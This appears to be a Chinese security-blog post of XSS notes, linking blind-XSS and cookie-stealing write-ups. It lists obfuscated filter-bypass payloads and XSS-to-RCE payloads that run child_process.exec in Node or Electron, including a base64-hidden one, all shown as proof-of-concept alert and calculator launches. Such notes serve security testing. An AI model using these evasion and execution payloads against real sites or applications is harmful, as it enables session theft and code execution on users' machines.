关于XSS


EZXSS 一款XSS盲打漏洞测试工具

http://caidaome.com/?post=205

一些漏洞点及骚思路

  • 新用户注册存储型XSS盲打获取Cookie

https://baijiahao.baidu.com/s?id=1700829679816535168&wfr=spider&for=pc

  • 文件上传存储型XSS盲打获取Cookie

https://cloud.tencent.com/developer/article/1856838

  • 投诉处XSS盲打

https://www.secpulse.com/archives/147537.html?ivk_sa=1024320u

  • 日志xss打内网,nginx&apache结合的bug

https://www.csdn.net/tags/NtjaMg4sNzQyOTgtYmxvZwO0O0OO0O0O.html

xss-代码角度理解与绕过filter

https://www.cnblogs.com/Dark1nt/p/14852560.html

Some Payload

https://github.com/TyrantSec/Fuzzing/blob/master/XSS-Polyglots/99-XSS-Polyglots.txt

<style onload=eval(atob("YWxlcnQoMSkK"));></style>
<script>top[`al`+`ert`](1)</script>
<img src="x" onerror="top['al'+'ert'](1)">
<svg onload='top["al"+"ert"](1)'>
<script>𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()</script>

XSS→RCE

https://mp.weixin.qq.com/s/fh0JCWsv95NwBlmKN6rCNQ

<audio src=http://a onerror='eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ2NhbGMuZXhlJywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0+e2FsZXJ0KGBzdGRvdXQ6ICR7c3Rkb3V0fWApO30pOw==`,`base64`).toString())'>

https://mp.weixin.qq.com/s/ZjYtFS8v4l6inEXnLoWTuw

https://mp.weixin.qq.com/s/wiT_Jh311FMdzqNb9AozWw

<script>
  require('child_process').exec('calc');
  // 或者
  top.require('child_process').exec('open /System/Applications/Calculator.app');
</script>

声明:Hack All Sec的博客|版权所有,违者必究|如未注明,均为原创|本网站采用BY-NC-SA协议进行授权

转载:转载请注明原文链接 - 关于XSS


Hacker perspective for security